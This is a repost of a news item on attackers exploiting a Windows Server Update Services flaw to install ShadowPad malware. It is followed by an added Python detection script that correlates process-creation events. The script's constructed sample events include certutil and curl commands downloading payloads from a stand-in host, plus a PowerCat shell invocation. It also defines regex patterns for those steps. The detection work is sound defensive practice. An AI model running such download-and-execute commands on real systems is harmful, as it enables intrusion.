ShadowPad Malware Actively Exploits WSUS

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
thehackernews.com/2025/11/s…

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute ShadowPad malware. “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.”

Once installed, the malware launches a core module responsible for loading additional plugins embedded in the shellcode into memory. It incorporates multiple anti-detection and persistence techniques. The activity has not been attributed to any known threat actor.

“After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”

Edward Kiledjian @ekiledjian
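As an added defender-side example (not code from the article, ASEC or the post above), the chain described there, a WSUS service process spawning a shell followed by certutil or curl fetching a payload, can be correlated across process-creation events on a host. The sample events, the assumed WSUS parent-process names (WsusService.exe, the IIS w3wp.exe worker) and the rule names are constructed assumptions, not indicators from the report.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "wsus01", "parent": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -ep bypass -f C:\\Windows\\Temp\\powercat.ps1"},
    {"host": "wsus01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\\Windows\\Temp\\update.bin"},
    {"host": "wsus01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o C:\\Windows\\Temp\\loader.dll http://203.0.113.10/loader.dll"},
    {"host": "fileserver02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "fileserver02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\temp\\file.iso SHA256"},  # benign certutil use
]

WSUS_PARENTS = re.compile(r"(wsusservice\.exe|w3wp\.exe)$", re.I)  # assumption: WSUS service / IIS worker
SHELLS = re.compile(r"(cmd|powershell|pwsh)\.exe$", re.I)
LOLBIN_DOWNLOAD = [  # built-in tools the report names as the download stage, only when given a URL
    (re.compile(r"certutil\.exe$", re.I), re.compile(r"-urlcache|https?://", re.I)),
    (re.compile(r"curl\.exe$", re.I), re.compile(r"https?://", re.I)),
]
POWERCAT = re.compile(r"powercat", re.I)  # name-based, weak on its own; used only as a corroborating signal

def classify(ev):
    """Return the list of rule names a single process-creation event matches."""
    hits = []
    if WSUS_PARENTS.search(ev["parent"]) and SHELLS.search(ev["image"]):
        hits.append("wsus_spawns_shell")
    for image_re, arg_re in LOLBIN_DOWNLOAD:
        if image_re.search(ev["image"]) and arg_re.search(ev["cmdline"]):
            hits.append("lolbin_download")
    if POWERCAT.search(ev["cmdline"]):
        hits.append("powercat_invocation")
    return hits

def correlate(events):
    """Group rule hits per host; a WSUS-spawned shell plus a LOLBin download on one host is high severity."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    findings = {}
    for host, rules in per_host.items():
        if rules:
            high = "wsus_spawns_shell" in rules and "lolbin_download" in rules
            findings[host] = {"rules": sorted(rules), "severity": "high" if high else "low"}
    return findings

if __name__ == "__main__":
    for host, f in correlate(SAMPLE_EVENTS).items():
        print(host, f["severity"], ", ".join(f["rules"]))
```

The certutil hash check on fileserver02 produces no finding, which is the point of requiring a URL argument rather than alerting on the binary name alone.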